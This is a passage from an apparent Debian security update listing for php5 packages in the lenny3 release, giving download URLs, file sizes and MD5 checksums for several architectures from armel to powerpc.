Size/MD5 checksum: 18090 47efca43ed376bb56c584bf4142f2cce http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 16076 7a916d54498091f416aba69e8f413455 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 25716 6743f2f4e47bacfa1af2156700f34edc http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 365680 246c23cb2795e978c6ea9f5a9fd502e8 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 14698 844dc4f5c33c12fb29f02a966920e65e http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 8378 c4ad25a83aac7ec8eb3b6e7ebd0e0835 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 4946 e68d5dc9de2e1b357e3a103451e43998 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 33926 1bc7618ea66b116f1c3cf40461dba843 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 51074 2f66086fe1ff43f48f78cc19a62f9c8f http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 34502 2d3b27919cca86d4ffc1bb3432ed45a0 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 12611096 a96c4f8455c55b10c29d7b1ee4abe6d0 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 11296 74fe794a2b66638abce9079f2e47f3cf http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 63514 749163b778cbe8cff813151318e2fdd7 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 34454 9edccd6ec58a93fcec11093ce58093b0 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 35800 759f1906049959564c94fb231b25c0c9 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 24416 e1c0646dedda48e90db1606ca20c6cf1 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 14356 bf5d1d053cf04864392e7a996abc267f http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 367412 9b75cd1f98c3d90ef953a9fdfd21e02f http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 12304 783ed815559a52df31cf7661b923633f http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 4848990 2f7c43758731da7978ff24a89fbf1a3b http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 2449358 73b679596d4d93d5d685c2a26557ffc0 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_armel.deb Size/MD5 checksum: 4708 ec0fc45904ecc1f4596bec15afed0497 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 40736 f33cb2911e71a51674e8741e2ce61c08 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 2749420 beeecfb344131356eb6eff2e2e94fecf http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 74564 2ea598bc0311e9699029dd03610fdac7 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 19984 f4352dbd95e8cebbc9c8ca977d1feca0 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 14686 46b051b5a56f77e8a8098798b4602232 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 39146 38619dde3ecd29a7f7070da832cb7c7c http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 16694 07ea4bb593c81893f283cd887f2bad09 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 28958 dfd907097db9bb580047887b77a3fb8a http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 2641938 4e17eb8f25094e609fe37a441bd5a4d6 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 40134 890c40d62c7041f16fbf801de77cd235 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 12966 2cebc8946d950db50edf3e8e1eeff1ce http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 367052 f6142014a803287d591ac4ab34a5ff47 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 8830808 1b2af51642cb83aa2b77c43c2e995152 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 59434 9931ffeea8f159e1f6951f99743eead7 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 28002 8210adcfbc01fc08544b16af1d3d43ea http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 5898 cf291acd0a04a88d00df796cf3b54c6e http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 5602 ebc0dde97a1771838e303fae199508a6 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 371086 76491387601681b3b0888db105e81ac3 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 41554 94fbd4fddd6e1803800a531b1ce12746 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 5248612 b43c8ccdb61309e8249ddf4e914e4191 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 9726 bf79d26dde940a516a497b1187640ed2 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 39018 dfef44dd259843297fd45ec5e091d85a http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 15670 e8b6a5acf8ff6b38de625a235bcd3935 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 2748260 ce830fe8c690e0214ceee078f9778147 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_hppa.deb Size/MD5 checksum: 21302 389bfc63e99e9cbaa43127bc06665fe8 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 18200 03972992f934da8f6aeb6f2cca4dd5fd http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 5126 9dbfbd5ce57e75164efc6cb235d3cfa5 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 2483986 1be4c2f4c2c744b62daee0050143911a http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 34702 62f3e86d2625349af25b62a920e21d85 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 2482644 6bcd2508df82ca5f64e735ea63edb0b8 http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 32356 97097ecd55e89dc78c43dd8203c00ab0 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 12792 657051063ff05d5597af23a9ea697997 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 4828 2ee8b7a5816945297a77ac7a5a79ae97 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 366788 5f245e6a03d0315a45f9b98b9ca2af23 http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 45136 f26b12264c47176f61b9e59bce3ba474 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 2474654 f0f2f18d1df04aab14eda7c7026879d6 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 34568 8a960581290c54dd95786c6f5090ec4b http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 37656 6eb754917adb072091cc80cf7579ffb6 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 12886 0835c4f17a2b20ecce12f8dcb3714aeb http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 23722 f4f7a7bf8352e362d20a8ddc89b65eea http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 11564 2b13e97918ae06538c531f1ac2551946 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 65628 40b3c044fc5d2d984753a10f51ccccc6 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 4909730 59fd55575b063c57155f64dd6071a59c http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 34154 9d7cf22aab3efe54bf04234a894b4359 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 8485794 cdaffbf77b10e9432d63c54cba212509 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 25012 4572f8c5944ce82a56009dcba26fe975 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 16572 e97a5b3a5fc375309abd4dadb1198024 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 363180 0ac60aa6e71eb91967f9994b11548d36 http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 52364 553e422b3e6195d1b28a2fc047228272 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 14160 5b03292b3addc6e51e02ca914454d051 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_i386.deb Size/MD5 checksum: 8436 8a1b84dd90bd2efbf4d76a9ee288f900 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 50636 df9fa2474b1eb2427f02cdf23f26505d http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 18600 0f15eae062eb3680342c96bcf8e250f6 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 26678 739c289f9981dad4ab8be25de4814040 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 97418 d970c3f1a552ce490fc4ddc7ecf53eed http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 54920 834f8865b35c5e318ddfc3b1df3ab5e7 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 362744 9622323f0971e0f78201673073db348c http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 34382 f34c3b8fdbeb137d2c4e4f4f0d5e2d68 http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 51776 bf02b09da989438877160a49a46743fc http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 20526 4c2eb2be72ace2e64c37ef0cbb18c99d http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 6610622 098132e4ce093e8b410c982673a2ccb5 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 18186 4170afb463a3b6f9bf931de6efec764b http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 11950 fb96fc4f5501a5f8bd7dd1f06be4327e http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 3379682 87bee2433d8cb500dad6e56945616c5e http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 54634 38095cd75904d4034981bf56f19c5702 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 6234 b0246dbe2fbb34be510fc714ec7820f8 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 38224 e1c8aae39f696ac46486e7df470fca65 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 15846 9bf65e7619421406073ed34d7bb003da http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 50862 bf81161931168566a947db412aeecba6 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 24684 d57d53449cff02bd204317f75c89f45e http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 3377378 e5237ffb1957f53c2f61a2d117ce0e7d http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 383616 ead507c100d8bceffa3cdf46c10846d9 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 6542 11859d19492fe8d23191223758c4969d http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 17615940 7da664c6a7abb8ad27d750fbf8d7c51b http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 80456 ea54885ed923fe7db3d99f42d7313451 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_ia64.deb Size/MD5 checksum: 3324810 e2c0185359aac47366d74ffcbe6d7b18 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 12370 c7df846c5a1c96dcaa2a8ab25d0c734d http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 33802 2b06e4163cd89e9dc2dd6d2d5b1c549f http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 32420 d2a83265d61bdc464dbf6fed555177c5 http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 8280 e5614cfc506bc38b3e384d5f13c63e93 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 365930 833f32ef30d85836b3e0ff835da48ad9 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 4960484 ae26c572724e5bb00a031d25e3cf9c56 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 16028 7afaf657e3e5986407bd0e62d3cc0cf2 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 32340 c74296f000684e11c4cf02dd38b8e674 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 2520660 2cffc25df8d5525fa00bcae563c8b660 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 24900 b04684aef1fd563d064bb2347ff335de http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 12924 c0c92df64353f652e75bd88fd516dff9 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 362864 9d44905fcc1b476f57c8b9fe51baa119 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 18426 f0b30634a92e95370653dc64ce1f516d http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 51122 9a84342646cd054676257817b69e74f9 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 5304 98034e9fd6f10df205e51a68d08d2861 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 9446130 eeaff147c7153b3317b06b05e6a95a75 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 5002 ced3345c2993c3f9d8c10a9a7546bf6f http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 23192 eab36b7a4fd91ade6d90b047fde42ba5 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 63516 3f3bd60a61ace778bf4539c69e16ade4 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 2491762 aca8c5d9a48fe4167b833bf2cec509d9 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 2519060 f44a149a9d8e799abf8d82053d10db83 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 35498 5f7fa5c897bcc493119439fc721c840b http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 11508 1194b41152bdf03addff830a199b6ae7 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 13302 ab380e26e504be58ad29acdf59d1669f http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_mips.deb Size/MD5 checksum: 35776 3b7351942ffef746b49684cce9fa89bd mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 33566 84b9fe4889bd6a34eb193feed16d7b94 http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 13202 0405d95601a6fe7837f3cd1cc6853287 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 2476526 7d8c5af525c5664f71ad07b08e63209d http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 4990 29142a37738e81b5e1d631ed6e3e2875 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 32260 0997f248adddd23ed415cd6bbd55735a http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 31794 87ea44868934417418ce97de380a10dd http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 12836 842b17ac23f91f85a959b56bbdcb0c4d http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 2477602 b69fcc9c0174e695ec434afc6c4d14f4 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 365260 1a0ed4b1f60a285f7f87dfb0534cfe09 http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 24758 df1ce5be247367f67ae6e80d907ab41d http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 62746 8bb27e77fbad03df7e03d01cb8932743 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 23094 0027bd65d42869e010ab2bf654c5d36b http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 11438 587fb68608ab53f352eff1c9b5a5c968 http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 15904 2b9eb9ea7485d79a3127fa10d29dd4a9 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 18326 8102924db02ce08edaa5090225504d52 http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 2467346 43518bc368b3298df596d114051a64cf http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 8212 5f7fc7ed29922901aefee1322acf2fba http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 50786 16fccd64ccfe880355b8eb7e6d467075 http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 362816 a1be41f39de860104f23745ce30eb60f http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 12310 7646f6f475c51b8903e097daca712950 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 35228 86c7f6031f849b10ae5147575bec1262 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 5272 965b8b4e3cc0e5229ecf0e7345767194 http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 35648 8fb35906d69b0cee69b92eaa3409c992 http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 8844704 e386a1de15fa024821baa029ee908be5 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_mipsel.deb Size/MD5 checksum: 4904808 5f8a2dc28c3ac0b8ed0d1f608f2ff1b1 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 362902 0be5fc02aec8884c8acec55600975c7d http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 60398 c0a7ffbeaa571375c992458c468e3c69 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 5072872 bd44f781031120eba5d8f0d8d7c830e3 http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 370118 7cdc7e4b37c72f4e55ef1396ad983438 http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 28060 16d0be6b6fd5c3602ece5343bf18d2b8 http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 39122 fddaa821c6f5794620e9322e8871c0bb http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 42752 b6f5d6caa8112190003387b5bbe333ea http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 14130 5fb950c2393bc1bee3bd936f8a84021b http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 41052 2683cd5643fec2e95afab59637cd4efd http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 7522 a05450cb115a47805de4bcf8fe740c7a http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 21528 54024ed51baff5e6e6ac9b3e62a8bef4 http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 2647478 881062b9bddbef63d37dc0ef5a2e7b9c http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 20048 b83774dc4ae11dd797be6e963671bc74 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_powerpc.deb Size/MD5 checksum: 7222 3e05102da0f2502ebdecf0147c03a896 